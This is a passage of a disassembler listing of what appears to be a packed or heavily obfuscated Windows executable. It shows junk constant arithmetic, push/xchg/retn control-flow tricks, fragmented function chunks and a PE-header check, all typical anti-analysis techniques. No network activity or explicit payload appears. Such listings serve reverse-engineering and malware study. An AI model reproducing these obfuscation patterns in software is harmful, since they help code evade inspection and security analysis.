lea eax, [ebp-125h]
push eax
call sub_42780F
mov [ebp-4], eax
jmp loc_423F5C
sub_422B4F endp
; ---------------------------------------------------------------------------
mov edx, 81424EE7h
push ecx
; START OF FUNCTION CHUNK FOR sub_42266A
loc_422B6D: ; CODE XREF: sub_42266A:loc_42C331�j
push 5C210D3Bh
pop ecx
add ecx, 0A42177C4h
jmp loc_421789
; END OF FUNCTION CHUNK FOR sub_42266A
; ---------------------------------------------------------------------------
push 393E2F70h
pop edx
xor edx, 685EFFD7h
jns loc_4266CB
; START OF FUNCTION CHUNK FOR sub_42B0C9
loc_422B90: ; CODE XREF: sub_42B0C9+D�j
jmp loc_429817
; END OF FUNCTION CHUNK FOR sub_42B0C9
; ---------------------------------------------------------------------------
push 6A1D0E0Ah
jmp loc_422ECB
; ---------------------------------------------------------------------------
xchg ebp, [eax]
jmp loc_421ABA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427ABD
loc_422BA6: ; CODE XREF: sub_427ABD�j
push 6C4F3BC9h
mov eax, offset loc_422BB9
xchg eax, [esp+4+var_4]
retn
; END OF FUNCTION CHUNK FOR sub_427ABD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_422BB4: ; CODE XREF: sub_4294B3-442C�j
jmp loc_425429
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
loc_422BB9: ; DATA XREF: sub_427ABD-4F12�o
and eax, ds:4000F9h
rol eax, 4
push offset loc_422D4D
jmp locret_422677
; ---------------------------------------------------------------------------
loc_422BCC: ; CODE XREF: _94j21ax3:00423018�j
jno loc_424D31
jnz loc_42C2E9
; =============== S U B R O U T I N E =======================================
sub_422BD8 proc near ; CODE XREF: _94j21ax3:00427509�p
xchg edx, [esp+0]
pop edx
pushf
mov [esp+0], eax
ror eax, 1Ch
mov ds:dword_42C214, eax
sub_422BD8 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_422BE9: ; CODE XREF: sub_4272E9+4F8D�j
jmp nullsub_184
; END OF FUNCTION CHUNK FOR sub_4272E9
; ---------------------------------------------------------------------------
loc_422BEE: ; DATA XREF: sub_423284:loc_4239E7�o
jnb loc_423E3F
mov eax, [ebp-4]
cmp byte ptr [eax], 0
jnz loc_428448
mov eax, [ebp-8]
mov byte ptr [eax], 0
mov esp, ebp
pop ebp
jmp locret_423E3E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_422C0E: ; CODE XREF: sub_4272E9:loc_428ADC�j
push eax
lea eax, sub_425157
xchg eax, ebx
push ebx
xchg eax, ebx
push offset sub_421BF6
jmp loc_42C46E
; END OF FUNCTION CHUNK FOR sub_4272E9
; ---------------------------------------------------------------------------
loc_422C24: ; DATA XREF: sub_421047+98A8�o
jnz loc_429C8F
mov eax, [ebp-20h]
push offset sub_424F07
jmp locret_42486A
; ---------------------------------------------------------------------------
loc_422C37: ; DATA XREF: _94j21ax3:00426739�o
push eax
call sub_423F43
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424CF2
loc_422C3E: ; CODE XREF: sub_424CF2+A�j
jmp loc_423047
; END OF FUNCTION CHUNK FOR sub_424CF2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F55
loc_422C43: ; CODE XREF: sub_423F55+29A�j
jmp loc_4221C8
; END OF FUNCTION CHUNK FOR sub_423F55
; =============== S U B R O U T I N E =======================================
sub_422C48 proc near ; CODE XREF: sub_424775:loc_423E53�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00421FB1 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00424523 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00424594 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00425A17 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00426BAD SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00427430 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004274C8 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00428AC7 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00429255 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00429549 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042C1DD SIZE 0000001D BYTES
call sub_42A9E7
loc_422C4D: ; CODE XREF: sub_42B358-9B90�j
mov esi, 4DCAE82Bh
loc_422C52: ; CODE XREF: sub_42B358-9B97�j
add edi, 553555B4h
xchg edi, [esp+0]
jmp loc_4274C8
sub_422C48 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425790
loc_422C60: ; CODE XREF: sub_425790:loc_4225FE�j
jz loc_42C009
jmp loc_429C39
; END OF FUNCTION CHUNK FOR sub_425790
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_188. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425790
loc_422C6C: ; CODE XREF: sub_425790-41CE�j
jmp nullsub_113
; END OF FUNCTION CHUNK FOR sub_425790
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425808
loc_422C71: ; CODE XREF: sub_425808+C�j
xor eax, eax
mov al, [ebp-0Ah]
shr eax, 4
xor [ebp-0Ah], al
inc dword ptr [ebp-8]
inc dword ptr [ebp-4]
jmp loc_421D20
; END OF FUNCTION CHUNK FOR sub_425808
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4232F5
loc_422C87: ; CODE XREF: sub_4232F5+8EB4�j
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F6h
jz loc_42A3A2
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F7h
jmp loc_428B59
; END OF FUNCTION CHUNK FOR sub_4232F5
; =============== S U B R O U T I N E =======================================
sub_422CA6 proc near ; DATA XREF: _94j21ax3:0042919A�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004259CA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004264EF SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00426621 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427DED SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429324 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042AD44 SIZE 00000005 BYTES
test al, al
jz loc_4264EF
jmp loc_427DED
sub_422CA6 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_203. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_422CB4: ; DATA XREF: sub_42169F:loc_42715B�o
test al, al
jz loc_4283A8
jmp loc_42440A
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422CC1 proc near ; CODE XREF: sub_42283B�p
; FUNCTION CHUNK AT 00429768 SIZE 00000005 BYTES
xchg ebp, [esp+0]
mov ebp, [esp+0]
mov ebp, esp
push offset loc_4276E2
jmp loc_429768
sub_422CC1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422392
loc_422CD3: ; CODE XREF: sub_422392:loc_4273EB�j
push ecx
mov esp, ebp
call sub_42454E
loc_422CDB: ; CODE XREF: sub_426CF4:loc_42BAAC�j
add eax, [esp+4+var_4]
adc edx, [esp+4]
add esp, 8
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
cmp dword ptr [eax], 4550h
jnz loc_423E68
jmp loc_42A188
; END OF FUNCTION CHUNK FOR sub_422392
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_422CFC: ; CODE XREF: sub_423FCD:loc_42A3C9�j
pop esi
loc_422CFD: ; CODE XREF: sub_4272E9-21AB�j
add esi, 0F311886Fh
rol esi, 6
add esi, 153B3DF2h
jmp loc_42195C
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427849
loc_422D11: ; CODE XREF: sub_427849+20�j
mov eax, [ebp-4]
cmp byte ptr [eax], 0CFh
jz loc_421CE0
mov eax, [ebp-4]
cmp byte ptr [eax], 0E9h
jz loc_421CE0
jmp loc_423E39
; END OF FUNCTION CHUNK FOR sub_427849
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_52. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4258EB
loc_422D2F: ; CODE XREF: sub_4258EB-1DF2�j
; sub_4258EB+3FD0�j
mov eax, ds:dword_42C48C
mov al, [eax]
sub al, 99h
mov edx, ds:dword_42C48C
imul byte ptr [edx]
jmp loc_424E22
; END OF FUNCTION CHUNK FOR sub_4258EB
; ---------------------------------------------------------------------------
mov ecx, [ebp+0]
jmp loc_426A80
; ---------------------------------------------------------------------------
loc_422D4D: ; DATA XREF: _94j21ax3:00422BC2�o
add eax, 3BAFC226h
call sub_428F65
test al, al
jz nullsub_149
jmp loc_424DD7
; ---------------------------------------------------------------------------
mov edx, eax
jmp loc_422EAB
; ---------------------------------------------------------------------------
loc_422D6C: ; CODE XREF: _94j21ax3:loc_426547�j
add edx, 20CF4AB3h
or ebx, eax
rol ebp, 2
jmp loc_425B4B
; ---------------------------------------------------------------------------
call sub_424839
; START OF FUNCTION CHUNK FOR sub_423C51
loc_422D81: ; CODE XREF: sub_423C51+59B7�j
jmp loc_426552
; END OF FUNCTION CHUNK FOR sub_423C51
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42169F
loc_422D86: ; CODE XREF: sub_42169F:loc_4273E6�j
add eax, 0E7091FF0h
xchg eax, [esp-8+arg_4]
jmp sub_42C057
; END OF FUNCTION CHUNK FOR sub_42169F
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422D94 proc near ; CODE XREF: sub_4247A2�j
push ebp
mov ebp, esp
sub_422D94 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42B856
loc_422D97: ; CODE XREF: sub_42B856-6315�j
push ecx
mov esp, ebp
xchg ecx, [esp+4+var_4]
jmp loc_42B848
; END OF FUNCTION CHUNK FOR sub_42B856
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_422DA2: ; CODE XREF: sub_4272E9:loc_4273DC�j
shr esi, 10h
push esi
pop edi
jmp loc_42513D
; END OF FUNCTION CHUNK FOR sub_4272E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B487
loc_422DAC: ; CODE XREF: sub_42B487:loc_42B29A�j
jz loc_421D73
mov eax, [ebp-0Ch]
push eax
push eax
push offset loc_424F74
jmp nullsub_144
; END OF FUNCTION CHUNK FOR sub_42B487
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_57. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427AEB
loc_422DC2: ; CODE XREF: sub_427AEB+33F8�j
jmp loc_42C33E
; END OF FUNCTION CHUNK FOR sub_427AEB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272C3
loc_422DC7: ; CODE XREF: sub_4272C3+2F4D�j
jmp nullsub_9
; END OF FUNCTION CHUNK FOR sub_4272C3
; ---------------------------------------------------------------------------
loc_422DCC: ; CODE XREF: _94j21ax3:00422B0D�j
jnz loc_4275F3
xor edi, esi
; START OF FUNCTION CHUNK FOR sub_423081
loc_422DD4: ; CODE XREF: sub_423081-58B�j
call sub_4250D0
loc_422DD9: ; CODE XREF: sub_42A0CC-54ED�j
jmp loc_422A0A
; END OF FUNCTION CHUNK FOR sub_423081
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4248E7
loc_422DDE: ; CODE XREF: sub_4248E7+16�j
mov eax, [eax+64h]
add eax, [ebp-14h]
cmp eax, [ebp-0Ch]
ja loc_421E71
jmp loc_424A8C
; END OF FUNCTION CHUNK FOR sub_4248E7
; =============== S U B R O U T I N E =======================================
sub_422DF2 proc near ; CODE XREF: _94j21ax3:00424E83�p
; _94j21ax3:0042B0B2�j
; FUNCTION CHUNK AT 0042A104 SIZE 0000000C BYTES
mov [esp+0], ecx
pop ecx
add edi, 0E5635C3Ah
mov [edi], eax
pop edi
push ebp
lea eax, [ebp-4]
jmp loc_42A104
sub_422DF2 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_213. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42851E
loc_422E09: ; CODE XREF: sub_42851E+1974�j
jmp nullsub_151
; END OF FUNCTION CHUNK FOR sub_42851E
; ---------------------------------------------------------------------------
loc_422E0E: ; CODE XREF: _94j21ax3:00427F53�j
jmp loc_42C2B9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_422E13: ; CODE XREF: sub_42C0BC:loc_424637�j
jl loc_42488B
loc_422E19: ; CODE XREF: sub_423A56+74E6�j
jmp loc_426BFF
; END OF FUNCTION CHUNK FOR sub_42C0BC
; ---------------------------------------------------------------------------
jo loc_4277D8
js loc_422700
jmp loc_42488B
; ---------------------------------------------------------------------------
loc_422E2F: ; CODE XREF: _94j21ax3:0042904F�j
jo loc_4217CD
cdq
; =============== S U B R O U T I N E =======================================
sub_422E36 proc near ; CODE XREF: sub_429A13+12�p
arg_0 = dword ptr 4
mov [esp+0], edx
pop edx
xchg eax, [esp-4+arg_0]
retn
sub_422E36 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421D33
loc_422E3E: ; CODE XREF: sub_421D33:loc_42157B�j
jmp loc_42B511
; END OF FUNCTION CHUNK FOR sub_421D33
; =============== S U B R O U T I N E =======================================
sub_422E43 proc near ; DATA XREF: sub_429A13+D�o
; FUNCTION CHUNK AT 004254BF SIZE 00000007 BYTES
pop ebx
jmp loc_4254BF
sub_422E43 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
or ecx, 765200C7h
jmp sub_421CCE
; ---------------------------------------------------------------------------
loc_422E54: ; CODE XREF: _94j21ax3:0042247C�j
mov ebp, 827D23B7h
; =============== S U B R O U T I N E =======================================
sub_422E59 proc near ; CODE XREF: _94j21ax3:00428170�p
; FUNCTION CHUNK AT 004258AE SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00428B18 SIZE 0000000B BYTES
xchg ecx, [esp+0]
pop ecx
call sub_4239A5
jmp loc_4258AE
sub_422E59 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_422E67: ; CODE XREF: _94j21ax3:0042B4A8�j
jge loc_429D68
cmp ebx, eax
jmp loc_428D47
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_422E74: ; CODE XREF: sub_422EB0+7BE2�j
mov [eax], edx
jmp loc_428924
; END OF FUNCTION CHUNK FOR sub_422EB0
; =============== S U B R O U T I N E =======================================
sub_422E7B proc near ; CODE XREF: sub_424C37+5574�p
; _94j21ax3:loc_42BFC5�j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042BAFD SIZE 00000010 BYTES
mov [esp+0], ecx
pop ecx
push 13EEEC86h
pop eax
add eax, 4639620Ah
add eax, ebp
add eax, 0A5D7AEA8h
popf
jmp loc_42BAFD
sub_422E7B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424EE4
loc_422E99: ; CODE XREF: sub_424EE4+4DD�j
ror ebx, 16h
not ebx
mov ebx, edx
sbb edx, 11D8576h
jmp loc_423DFA
; END OF FUNCTION CHUNK FOR sub_424EE4
; ---------------------------------------------------------------------------
loc_422EAB: ; CODE XREF: _94j21ax3:00422D67�j
; _94j21ax3:00428D23�j
push 64FEB67Eh
; =============== S U B R O U T I N E =======================================
sub_422EB0 proc near ; CODE XREF: sub_42B500+4�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004212BA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004213F7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004218B3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004218D3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00421BA3 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00421E79 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004224C0 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00422E74 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00422F7B SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00423FEC SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00424A4C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424E17 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042546B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004255F6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425610 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004269FD SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00426B24 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426CE8 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004272F4 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00427636 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427ACD SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042813D SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00428553 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00428924 SIZE 0000002A BYTES
; FUNCTION CHUNK AT 00428E48 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428F82 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004292A0 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004292F8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429312 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004295E8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004299AB SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042A0EA SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042A592 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AA21 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AA8C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042AE17 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AE3A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B221 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042B9B5 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042BC7E SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042BD8F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042BF64 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042C116 SIZE 00000007 BYTES
xchg ecx, [esp+0]
pop ecx
mov esp, ebp
xchg ebx, [esp-4+arg_0]
mov ebp, ebx
jmp loc_426B24
sub_422EB0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_422EC0: ; CODE XREF: sub_42284F:loc_421B77�j
jnz loc_4296E2
jmp loc_42557D
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
loc_422ECB: ; CODE XREF: _94j21ax3:00422B9A�j
rol edx, 3
and edi, 0EEAC9455h
test edi, 572169F7h
jmp loc_4266C5
; ---------------------------------------------------------------------------
locret_422EDF: ; CODE XREF: _94j21ax3:loc_421FBF�j
retn
; ---------------------------------------------------------------------------
loc_422EE0: ; CODE XREF: _94j21ax3:0042A6F8�j
jmp loc_429FAB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427679
loc_422EE5: ; CODE XREF: sub_427679+D�j
jmp loc_4266B4
; END OF FUNCTION CHUNK FOR sub_427679
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42454E
loc_422EEA: ; CODE XREF: sub_42454E+347D�j
or edi, eax
loc_422EEC: ; CODE XREF: sub_42454E+3475�j
or edi, 5666337Eh
add edi, 8953F8F1h
popf
jmp loc_423732
; END OF FUNCTION CHUNK FOR sub_42454E
; ---------------------------------------------------------------------------
loc_422EFE: ; CODE XREF: _94j21ax3:0042711F�j
jg loc_428367
jbe locret_426ACC
; =============== S U B R O U T I N E =======================================
sub_422F0A proc near ; CODE XREF: sub_428954-1556�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0042B06A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B90A SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042C4D0 SIZE 00000014 BYTES
mov [esp+0], edx
pop edx
jb loc_42C4D0
call sub_4291BC
loc_422F19: ; CODE XREF: sub_424F07+4D83�j
jmp loc_427E9C
sub_422F0A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A7A6
loc_422F1E: ; CODE XREF: sub_42A7A6-38C9�j
jmp loc_421C2D
; END OF FUNCTION CHUNK FOR sub_42A7A6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_116. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_422F24: ; CODE XREF: _94j21ax3:0042941D�j
jmp loc_426778
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427CEA
loc_422F29: ; CODE XREF: sub_427CEA+DC7�j
jmp sub_428709
; END OF FUNCTION CHUNK FOR sub_427CEA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429CAE
loc_422F2E: ; CODE XREF: sub_429CAE-7619�j
jmp loc_42B793
; END OF FUNCTION CHUNK FOR sub_429CAE
; ---------------------------------------------------------------------------
pop edi
jo loc_42581C
jmp sub_423F55
; ---------------------------------------------------------------------------
loc_422F3F: ; DATA XREF: _94j21ax3:loc_42BBEF�o
mov dword ptr [ebp-18h], 0
; START OF FUNCTION CHUNK FOR sub_423324
loc_422F46: ; CODE XREF: sub_423324+6979�j
push offset sub_4223EF
jmp loc_42594E
; END OF FUNCTION CHUNK FOR sub_423324
; =============== S U B R O U T I N E =======================================
sub_422F50 proc near ; CODE XREF: sub_4248E7:loc_428C7B�p
; _94j21ax3:0042A4B8�j
; FUNCTION CHUNK AT 00423F37 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042A606 SIZE 0000000D BYTES
mov [esp+0], ebx
pop ebx
cmp dword ptr [ebp-8], 0A22F8A70h
jz loc_423F37
jmp loc_42A606
sub_422F50 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427A68
loc_422F66: ; CODE XREF: sub_427A68-3383�j
shl ebp, 8
jno loc_424303
jmp loc_421A16
; END OF FUNCTION CHUNK FOR sub_427A68
; ---------------------------------------------------------------------------
mov ebx, [edx]
jmp sub_4232F5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_422F7B: ; CODE XREF: sub_422EB0:loc_424A52�j
not ebp
rol ecx, 1Dh
mov ecx, ebx
jns loc_427636
mov [edx], edi
jmp loc_4224C0
; END OF FUNCTION CHUNK FOR sub_422EB0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424692
loc_422F8F: ; CODE XREF: sub_424692:loc_423A0B�j
push 1F8EBD3Ah
pop eax
add eax, 0E0B3BF17h
xchg eax, [esp+0]
; END OF FUNCTION CHUNK FOR sub_424692
; START OF FUNCTION CHUNK FOR sub_42284F
loc_422F9E: ; CODE XREF: sub_42284F-12A7�j
jmp sub_42C057
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A277
loc_422FA3: ; CODE XREF: sub_42A277+F86�j
add edx, 0B3479E69h
jno loc_4232E5
xor ebx, esi
jmp loc_425233
; END OF FUNCTION CHUNK FOR sub_42A277
; ---------------------------------------------------------------------------
loc_422FB6: ; CODE XREF: _94j21ax3:00428A8B�j
jnz loc_424B15
; =============== S U B R O U T I N E =======================================
sub_422FBC proc near ; CODE XREF: sub_421246+3B7A�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004240DE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428DDC SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00429B20 SIZE 00000009 BYTES
mov [esp+0], edi
loc_422FBF: ; CODE XREF: _94j21ax3:0042811E�j
pop edi
mov [esp-4+arg_0], ecx
jmp loc_4240DE
sub_422FBC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_422FC8 proc near ; DATA XREF: sub_42131B+38F9�o
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004232E0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428318 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042863C SIZE 0000000E BYTES
xor ecx, 8CF36405h
xor edx, edx
div ecx
call sub_424B8F
loc_422FD7: ; CODE XREF: sub_429280+14�j
jmp loc_42863C
sub_422FC8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_422FDC proc near ; DATA XREF: _94j21ax3:00428B0E�o
; FUNCTION CHUNK AT 00421310 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00423B68 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00424667 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004266AF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426E7C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00428BA1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A95B SIZE 0000001F BYTES
cmp dword ptr [ebp-8], 0
jz loc_424667
sub_422FDC endp
; START OF FUNCTION CHUNK FOR sub_423614
loc_422FE6: ; CODE XREF: sub_423614:loc_4230E6�j
; _94j21ax3:00424661�j ...
jz loc_429F04
cmp dword ptr [ebp-1Ch], 0Fh
jnz loc_426D3D
mov eax, [ebp-1Ch]
shl eax, 8
jmp loc_42AA55
; END OF FUNCTION CHUNK FOR sub_423614
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_179. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422866
loc_423002: ; CODE XREF: sub_422866+6CC8�j
jmp loc_426955
; END OF FUNCTION CHUNK FOR sub_422866
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AED
loc_423007: ; CODE XREF: sub_424AED+3926�j
jmp nullsub_56
; END OF FUNCTION CHUNK FOR sub_424AED
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_77. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B77
loc_42300D: ; CODE XREF: sub_425B77+8�j
jmp loc_424029
; END OF FUNCTION CHUNK FOR sub_425B77
; ---------------------------------------------------------------------------
cmp ebp, 0DFEEBA9Dh
jmp loc_422BCC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428B5E
loc_42301D: ; CODE XREF: sub_428B5E+E�j
jz loc_424232
jmp loc_425138
; END OF FUNCTION CHUNK FOR sub_428B5E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_423028: ; CODE XREF: sub_42284F+582D�j
; sub_42284F:loc_42C531�j
call sub_421644
; END OF FUNCTION CHUNK FOR sub_42284F
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_42302D: ; CODE XREF: sub_4294B3-CAE�j
test esi, 7ED985A6h
jmp loc_42BEB4
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429A83
loc_423038: ; CODE XREF: sub_429A83-468B�j
xchg ebx, [edx]
pop ecx
jns sub_42A5B9
loc_423041: ; CODE XREF: sub_429A83:loc_4282A3�j
add dword ptr [esi], 0F80486h
; END OF FUNCTION CHUNK FOR sub_429A83
; START OF FUNCTION CHUNK FOR sub_424CF2
loc_423047: ; CODE XREF: sub_423FCD-1CFF�j
; sub_423081:loc_422AFC�j ...
pop edi
pop esi
pop ecx
xchg esi, [esp-0Ch+arg_8]
jmp loc_42C4AC
; END OF FUNCTION CHUNK FOR sub_424CF2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4211F4
loc_423052: ; CODE XREF: sub_4211F4+B�j
xor eax, 60AA98B6h
and eax, 0DCB41D66h
add eax, 382E772Fh
xchg eax, [esp+8+var_8]
jmp sub_423F43
; END OF FUNCTION CHUNK FOR sub_4211F4
; =============== S U B R O U T I N E =======================================
sub_42306C proc near ; DATA XREF: sub_4210BC+1�o
; FUNCTION CHUNK AT 0042AED3 SIZE 00000006 BYTES
cmp dword ptr [ebp-14h], 5
setz al
call sub_4215F9
pop ecx
shl eax, 3
jmp loc_42AED3
sub_42306C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_423081 proc near ; CODE XREF: _94j21ax3:0042A660�j
; sub_42484C+6B2E�p
; FUNCTION CHUNK AT 00422A0A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00422AF0 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00422DD4 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004259F0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429574 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042A006 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042B2D7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C606 SIZE 00000011 BYTES
